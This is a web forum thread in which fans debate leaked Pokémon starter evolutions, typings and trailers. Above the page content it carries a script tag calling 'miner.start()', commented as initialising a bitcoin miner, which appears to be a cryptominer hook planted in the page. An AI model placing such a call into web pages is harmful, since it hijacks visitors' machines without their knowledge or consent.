<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

Pokémon

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Lunatic Quark
approximately three cats in a trenchcoat

Re: Pokémon

Postby Lunatic Quark » 1 year ago

I've given myself a compromise: pre-release promotional material is fine, but once the games come out I'm cutting myself off from the internet until I beat it, also I'm trying to avoid as many leaks as I can, which I'm already somewhat failing at as I accidentally saw some leaks of the supposed starter evolutions (

though I dunno whether I should be mad or not as otherwise I would've probably picked the starter whose evolution I like the least

)
super big thanks to bkamakaze for the avatar!

Mata Hari

Postby Mata Hari » 1 year ago

Lunatic Quark wrote:I accidentally saw some leaks of the supposed starter evolutions (

though I dunno whether I should be mad or not as otherwise I would've probably picked the starter whose evolution I like the least

)
They're probably fake fam

Ignoritus
O◡O
Pronouns: he/him/his

Postby Ignoritus » 1 year ago

Mata Hari wrote:
Lunatic Quark wrote:I accidentally saw some leaks of the supposed starter evolutions (

)
They're probably fake fam
Assuming he's thinking of the set that's been cycling everywhere, they're borderline confirmed. They contained a near exact portrayal of a character who wasn't shown prior. Only ambiguating factor was that it was very low resolution, but even so you can clearly make out every significant visual trait of that character on them.

Learning-Timebuster
avatar courtesy of ringor mortis
First name: Luka
Pronouns: she or they

Postby Learning-Timebuster » 1 year ago

my take on the starter evolution leaks is that theyre real, but theyre concept art, and potentially not even close to the finalized designs at all
"i like bugs"
t t

TaviTurnip
I'm just here to remind people I'm here
Abministrator
First name: Rena, despite assumptions

Postby TaviTurnip » 1 year ago

Sounding like /vp/ in here.
I'm just here to annoy you so that you aren't here instead.

Mata Hari

Ignoritus wrote:Assuming he's thinking of the set that's been cycling everywhere, they're borderline confirmed. They contained a near exact portrayal of a character who wasn't shown prior. Only ambiguating factor was that it was very low resolution, but even so you can clearly make out every significant visual trait of that character on them.
Oh snap. you're not wrong. Well in that case I'm going to experience max lol if MegaLitten is Fire/Fighting again. Which it appears to be. What the fuck is going on in your heads, GF?

Ivy

Postby Ivy » 1 year ago

I'm ready for the leak that suggested 4 unique final evolution typings for each starter to turn out real
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

Truhan
Lord of the Waifus
Pronouns: Waifulord

Postby Truhan » 1 year ago

Ivy wrote:I'm ready for the leak that suggested 4 unique final evolution typings for each starter to turn out real
So, like, two different evolutions for each starter (something like Espeon vs Umbreon) with two types that have never been combined before for each one?
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

idol
god's gonna come to my house and kill me
First name: charlotte
Pronouns: she/her

Postby idol » 1 year ago

Mata Hari wrote:Well in that case I'm going to experience max lol if MegaLitten is Fire/Fighting again.
if i were to guess, the final evo types would be Grass / Flying, Fire / Fighting, & Water / Fairy. however yeah, there's rumors / supposed leaks that the starters will have dual final evolutions. it would kinda be cool to have four legged fire / dark tiger and just upright wwe ass fire / fighting litten.
must b love on tha brain
[avi source]

HamsterZerg
True Pacifist or bust.
Location: Oh, don't mind me. I'm just contacting you from the distant past. Carry on.

Postby HamsterZerg » 1 year ago

Avatar by Skully (artwork) and bkamakaze (size). Thanks, guys!

[ispoiler]Somebody should make an animation where the knife slash at the end of the Genocide run is Frisk killing Chara, who is shocked, then scared, and finally sad, apologizing to Asriel and asking him for forgiveness.[/ispoiler]

Soma Cruz, Linkara, and Olimar for SMBX 2.0

Game King-style Story Briefs, a forum game by me

Mata Hari

ebin

PikaFlare
The sunlight is harsh....

Postby PikaFlare » 1 year ago

There aren't enough people on Steam to talk to regarding Pokemon. Anyone want to add each other and chat?

Ivy

Postby Ivy » 1 year ago

PikaFlare wrote:There aren't enough people on Steam to talk to regarding Pokemon. Anyone want to add each other and chat?
I'll get you a discord link; there's a Pokémon channel there
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

PikaFlare
The sunlight is harsh....

Postby PikaFlare » 1 year ago

Ivy wrote:
PikaFlare wrote:There aren't enough people on Steam to talk to regarding Pokemon. Anyone want to add each other and chat?
I'll get you a discord link; there's a Pokémon channel there
Thanks! I've actually never used discord, but I'll totally give it a shot!

Zeldamaster12

Postby Zeldamaster12 » 1 year ago

Opinions on Litten's leaked evolution?
stuff goes here

Lunatic Quark

Zeldamaster12 wrote:Opinions on Litten's leaked evolution?

uuuurrrrrrrggggghhhhhh (translation: the design of it doesn't particularly appeal to me very much, which is disappointing considering Litten was initially my favorite of the starters)

at least I'm liking the other 2 so far

Zeldamaster12

Postby Zeldamaster12 » 1 year ago

Yeah I agree. It kinda feels like a ripoff of Emboar in a way. Hopefully they change it to something more appealing because otherwise people will be even more outraged than they already are.

stuff goes here

idol
god's gonna come to my house and kill me
First name: charlotte
Pronouns: she/her

Postby idol » 1 year ago

part of me wants littens evo to stay the same so i can have a wwe ass tag team of emboar and litten's evo. i think thered be a lot of cool fanart of those two. i hope the rumor that the final evo's have split evolutions is true, though.

im in LOVE with popplio's evo tho. i rly hope the final evo looks somewhat like that still (and is water / fairy)... it's so elegant!

must b love on tha brain
[avi source]

Ignoritus
O◡O

Postby Ignoritus » 1 year ago

idol wrote:

part of me wants littens evo to stay the same so i can have a wwe ass tag team of emboar and litten's evo. i think thered be a lot of cool fanart of those two. i hope the rumor that the final evo's have split evolutions is true, though.

im in LOVE with popplio's evo tho. i rly hope the final evo looks somewhat like that still (and is water / fairy)... it's so elegant!

split evo leak got largely deconfirmed today by the confirmation that rockruff's evolution is a day/night split rather than the specific location evolution method the split evos leak claimed for it

"real leaks" leak still going strong as ever

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 1 year ago

https://youtu.be/wMzwcIG8vgk before you get too excited these will only be about 3-5 minutes each
That crazy voice dude

HamsterZerg
True Pacifist or bust.
Location: Oh, don't mind me. I'm just contacting you from the distant past. Carry on.

Postby HamsterZerg » 1 year ago

InsaneIntentions1 wrote:https://youtu.be/wMzwcIG8vgk before you get too excited these will only be about 3-5 minutes each
CAUTION: Low-flying Lugia in this area

Avatar by Skully (artwork) and bkamakaze (size). Thanks, guys!

[ispoiler]Somebody should make an animation where the knife slash at the end of the Genocide run is Frisk killing Chara, who is shocked, then scared, and finally sad, apologizing to Asriel and asking him for forgiveness.[/ispoiler]

Soma Cruz, Linkara, and Olimar for SMBX 2.0

Game King-style Story Briefs, a forum game by me

Mata Hari

New trailer :0 https://www.youtube.com/watch?v=ciqAkdXQ9dw

Leaked final evos basically confirmed... more confirmed. Fire/Fighting makes me upset but I like the other two so it should be OK. Plus who uses their starters anyway lol

bkamakaze
A million dollars isn’t cool. You know what’s cool? A basilisk.
First name: (◕ v ◕✿)

Postby bkamakaze » 1 year ago

Taken from Terracat's description:

"The cat punch that this Pokémon can dish out with its strong forelegs is extremely powerful. It can bend iron bars and knock out large men with a single blow!"

Welp, I'll concede to the starter leak now, shame we're back to Hotel Fire/Fighting
you can check out any time you like but you can never leave
ImageImageImage

Lunatic Quark

so right now Litten has my favorite first form, Rowlet has my favorite second form, and

Popplio

has my favorite final form (though

Rowlet

is close behind there) this is quite the interesting scenario...

my one possibly deciding factor so far is that there is already another grass type I'm planning to seek out

EvilMariobot

Postby EvilMariobot » 1 year ago

I'm still holding out hope for Litten's final form to be Fire/Dark to create a cycle of the last two starters. Fighting, Psychic, Dark.

Return to “the cartridgé”